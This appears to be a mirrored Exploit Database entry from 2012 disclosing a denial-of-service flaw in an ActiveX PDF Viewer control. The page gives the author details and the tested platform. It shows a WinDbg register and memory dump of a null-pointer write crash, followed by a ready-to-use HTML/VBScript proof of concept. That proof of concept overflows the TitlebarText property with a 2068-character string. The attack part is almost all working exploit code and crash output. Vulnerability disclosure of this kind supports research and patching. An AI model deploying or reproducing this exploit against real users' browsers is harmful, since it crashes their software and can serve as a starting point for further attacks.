PDF Viewer Component – ActiveX Denial of Service

• Exploit Database
• 12 阅读

• 作者： Senator of Pirates
  日期： 2012-02-05
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18463/

• Title : PDF Viewer Component ActiveX DoS
  Auther : Senator of Pirates
  E-Mail : Senator.of.Pirates.team@gmail.com
  FaceBook : FaceBook.Com/SenatorofPirates
  Software link : http://www.ocxt.com/download/PDFViewerSetup.exe
  Date : 05/02/2012
  Tested : Windows Xp SP3 EN
  
  eax=00000000 ebx=00000001 ecx=01800990 edx=01800990 esi=10150cd0 edi=000c5f6c
  eip=017a7a3e esp=0013c754 ebp=0013c758 iopl=0 nv up ei ng nz na po nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00210282
  017a7a3e c60000mov byte ptr [eax],0 ds:0023:00000000=??
  0:000> d eax
  00000000?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000010?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000020?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000030?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000040?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000050?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000060?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000070?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  0:000> d ebx
  00000001?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000011?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000021?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000031?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000041?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000051?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000061?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  00000071?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??????????????????
  
  <object classid='clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04' id='target' />
  <script language='vbscript'>
  
  targetFile = "C:\Program Files\PDFViewer\pdfviewer.ocx"
  prototype= "Invoke_Unknown TitlebarText As String"
  memberName = "TitlebarText"
  progid = "PDFViewerLib.PDFViewer"
  argCount = 1
  
  arg1=String(2068, "A")
  
  target.TitlebarText = arg1
  
  </script>